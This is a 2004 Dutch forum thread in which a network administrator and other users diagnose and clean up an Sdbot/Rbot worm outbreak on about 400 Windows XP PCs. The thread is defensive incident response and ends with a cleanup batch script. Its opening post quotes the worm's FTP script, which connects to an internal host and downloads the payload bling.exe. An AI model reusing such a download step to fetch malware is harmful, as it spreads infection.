[Malware] Windows-update.exe en bling.exe virus? - Privacy en beveiliging

vrijdag 15 oktober 2004 10:33

Acties:

Topicstarter

Ik heb het volgende probleem in een netwerk van 400 pc's (XP sp1, allemaal met Symantec Corporate 9, up-to-date)

Een virus verspreid zichzelf en wat alle pc's kenmerkt is:

• Windows-update.exe wordt gestart via HKLM\...Run en HKCU\...Run
• McAfee Stinger vind het W32/Sdbot.worm!ftp virus in het bestand C:\Windows\System32\o en kan het verdwijderen, maar windows-update.exe blijft draaien en wordt niet gedetecteerd.
In dit bestand "o" staat de tekst:

code:

open 172.16.201.23
user 1 1
get bling.exe
quit

_{ip adres veranderd steeds}

2 vragen:

Wat is dit windows-update.exe en bling.exe en hoe krijg ik het weg?
Ik kan totaal niks vinden op Google en Symantec.com voor wat betreft windows-update.exe

_{Symantec detecteerd in het geheel geen virussen op de pc's}

Waarom detecteert Symantec dit virus niet??

[ Voor 14% gewijzigd door Ye Greate'96 op 15-10-2004 10:35 ]

vrijdag 15 oktober 2004 10:41

Acties:

wildhagen

Blablabla

Omdat Symantec niet bepaald een goede virusscanner is?

Post je HijackThis-log eens, als je wilt? Volg hierbij wel de richtlijnen in de FAQ.

Trouwens, was 172.16.*.* niet een private-range, die niet Internet op kan? In dat geval is dat station met dat IP-adres dus waarschijnlijk gehacked, en is er een FTP (waarschijnlijk ServU) op gezet...

Ga dus de machine met IP 172.16.201.23 maar eens onderzoeken.... en haal hem zolang van het netwerk af om verdere infectie te voorkomen.

Ook de Hihackthis van die PC kon wel eens interressant zijn...

[ Voor 65% gewijzigd door wildhagen op 15-10-2004 10:43 ]

Virussen? Scan ze hier!

vrijdag 15 oktober 2004 10:48

Acties:

Verwijderd

Wat is dit windows-update.exe en bling.exe en hoe krijg ik het weg?

Al eens gezocht op google naar "W32/Sdbot.worm!ftp"? Ik denk dat dat je wel iets wijzer kan maken.

Het is aannemelijk dat windows-update.exe de SdBot zelf is.

Scan de windows-update.exe eens @ http://virusscan.jotti.dhs.org/ of @ http://www.kaspersky.com/scanforvirus.html want de eerste lijkt momenteel down te zijn.

Beide sites zullen je zeggen waarmee de file "gepackt" is, waarschijnlijk gaat het om een packer die SAV niet ondersteunt.(SAV/NAV hebben maar een zeer beperkt aantal unpackers aan boord)

vrijdag 15 oktober 2004 10:51

Acties:

F_J_K

Moderator CSA/PB

Front verplichte underscores

Op alle 400?

Even netwerk plat en de boel opschonen is zeker geen optie?

Sdbot.worm!ftp zegt helaas niet zo veel (je geeft zelf al aan wat het is). (IIRC) is 172.16-31 inderdaad uit een private range, apart dat daar wordt gekeken (of is het een bestaande interne machine, zoals wildhagen al aangeeft) - zijn het steeds interne IP adressen waar naar wordt verbonden?

Gooi de Windows-update.exe ook even door online scanners van bijv. / o.a. McAfee en Kaspersky. Misschien / hopelijk komt er een specifiek virus uit.

edit:
Ikke spuit11

[ Voor 3% gewijzigd door F_J_K op 15-10-2004 10:51 ]

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

vrijdag 15 oktober 2004 12:37

Acties:

KingCrash

Angry Rabbit

Deze symptomen komen mij bekend voor.
Sdbot wordt niet opgemerkt door symantec wel door Stinger.
Echter wel in een ander bestand (deze verschilt per pc)

Wat zijn je symtonen op het netwerk?
Grote vertraging en veel verkeer op (oa) poort 445?
RPC errors ("over 30sec gaat deze pc uit" meldingen)

Nog geen oplossing helaas...

Angry Rabbit

vrijdag 15 oktober 2004 13:10

Acties:

Ye Greate'96

Topicstarter

Van de 400 zijn er zo'n 150 geinfecteerd vermoed ik, de geinfecteerde pc's broadcasten als een gek.
Het effect is ook dat alle leds van de switches vast staan en niet meer knipperen. (en het netwerk word traag)

De oplossing waar wij nu mee bezig zijn is de Windows Update draaien op alle pc's, waardoor de "backdoor" dicht komt te zitten.

Vervolgens halen we de windows-update.exe uit de run en verwijderen we deze, net als bling.exe en c:\windows\system32\o

Maar dat is vreselijk veel werk, de Windows Update site is echt klote

_{Ik heb de online scan gedraaid van McAfee en TrendMicro, maar beide vonden niks}

[ Voor 11% gewijzigd door Ye Greate'96 op 15-10-2004 13:11 ]

vrijdag 15 oktober 2004 13:17

Acties:

Verwijderd

De oplossing waar wij nu mee bezig zijn is de Windows Update draaien op alle pc's, waardoor de "backdoor" dicht komt te zitten.

Precies waarom hou je die computers dan ook niet uptodate? Deze uitbraak had dus voorkomen kunnen worden.
En dan waarschijnlijk ook nog bij zo'n oude exploits...

Scan die file nou eens op de genoemde adressen? Eerste site is trouwens weer up

vrijdag 15 oktober 2004 13:33

Acties:

F_J_K

Moderator CSA/PB

Front verplichte underscores

Inderdaad doet http://virusscan.jotti.dhs.org het weer \o/ Gooi het daar ook even doorheen.

Windowsupdate brak: je hebt geen eigen server om updates te distribueren? Doe het eventueel met de hand door de update eenmalig te downloaden en in een script te gooien. Alle machines patches is idd zeker een optie. Ikzelf zou waarschijnlijk bijv. een gepatcht image over de oude images heengooien maar ken jouw situatie natuurlijk niet.

Verwijderd schreef op 15 oktober 2004 @ 13:17:
Precies waarom hou je die computers dan ook niet uptodate? Deze uitbraak had dus voorkomen kunnen worden.
En dan waarschijnlijk ook nog bij zo'n oude exploits...

offtopic:
De nieuwste patches meteen installeren is niet handig in grotere (productie)omgevingen; incompatibiliteiten enzo. Maar inderdaad is dat zoals weer blijkt geen reden om het niet te doen, alleen om het eerst goed te testen

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

vrijdag 15 oktober 2004 14:19

Acties:

Verwijderd

F_J_K schreef op 15 oktober 2004 @ 13:33:

offtopic:
De nieuwste patches meteen installeren is niet handig in grotere (productie)omgevingen; incompatibiliteiten enzo. Maar inderdaad is dat zoals weer blijkt geen reden om het niet te doen, alleen om het eerst goed te testen

Dat begrijp ik, maar de meeste vulns waar SdBots gebruik van maken zijn niet echt de nieuwste meer, rpc/lsass noem ik niet echt vers meer iig.

Er is imo meer dan genoeg tijd verstreken om enige problemen uit de weg te ruimen.

offtopic:
Normaal gesproken als McAfee een SdBot niet vindt, hoef je eigenlijk alleen nog te proberen met BitDefender, Dr. Web of Kaspersky, aangezien alleen die een gelijkwaardig/betere SdBot detectie hebben, de rest is meestal met afstand slechter.

vrijdag 15 oktober 2004 15:07

Acties:

Ye Greate'96

Topicstarter

Resultaten van http://virusscan.jotti.dhs.org waren:

voor zowel windows-update.exe en bling.exe hetzelfde:

Kaspersky Anti-Virus: Backdoor.Win32.Rbot.gen
Norman Virus Control: W32/Malware

_{Maar die laatste is wel erg algemeen....}
Ik heb alleen nog erg weinig gevonden op de Rbot.gen, geen removal iig

[ Voor 13% gewijzigd door Ye Greate'96 op 15-10-2004 15:07 ]

vrijdag 15 oktober 2004 15:14

Acties:

Verwijderd

Gepacked met UltraProtect...er is geen andere AV die dat kan unpacken.
Dus andere AVs zullen dit of missen, de gebruikte packer als kwaadaardig beschouwen, of via sandbox moeten kijken wat het beestje doet.
De tweede genoemde optie is bij deze packer minder aannemelijk, omdat UP commercieel verkrijgbaar is.

F-Secure heeft een tijdje geleden een Bot disinfection guide gemaakt, maarja, daarbij is het de bedoeling dat je F-Secure's producten gebruikt. http://www.f-secure.com/v-descs/netdisinf.shtml

Heb je de betreffende files al naar Symantec gesubmit? Voor corporate users zal er wel snel een(manual) update komen waarmee je de computers via SAV kunt cleanen.

vrijdag 15 oktober 2004 17:10

Acties:

Ye Greate'96

Topicstarter

Nou ik heb de meest simpele oplossing gevonden $_/-\o_$

Deze batchfile wordt nu geladen in 't login script van iedere user

code:

@echo off
if exist c:\windows\blaat goto end
attrib -s -h c:\windows\system32\Windows-Update.exe
ren c:\windows\system32\Windows-Update.exe b
del c:\windows\system32\bling.exe
del c:\windows\system32\o
c:\windows\system32\shutdown -l -t 3 -c "Met de complimenten van ICT"
copy c:\windows\taskman.exe c:\windows\blaat
goto end

:end
exit

Over 2 weken nog ff een snapshot van Novell eroverheen die 't bestand "b" verwijderd en dat was 'em!
Dank voor de info!

vrijdag 15 oktober 2004 20:57

Acties:

F_J_K

Moderator CSA/PB

Front verplichte underscores

c:\windows\system32\shutdown -l -t 3 -c "Met de complimenten van ICT"

Maar goed, zorg er natuurlijk wel voor dat ook meteen de vulnerability wordt opgelost voor het over een week weer gebeurt. Maar dat spreekt voor zich

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

vrijdag 15 oktober 2004 21:01

Acties:

Ye Greate'96

Topicstarter

F_J_K schreef op 15 oktober 2004 @ 20:57:
[...]

Maar goed, zorg er natuurlijk wel voor dat ook meteen de vulnerability wordt opgelost voor het over een week weer gebeurt. Maar dat spreekt voor zich

Ja, zeker, maar dit geeft ff wat adem
(overigens hebben we lekker een week herfstvakantie

)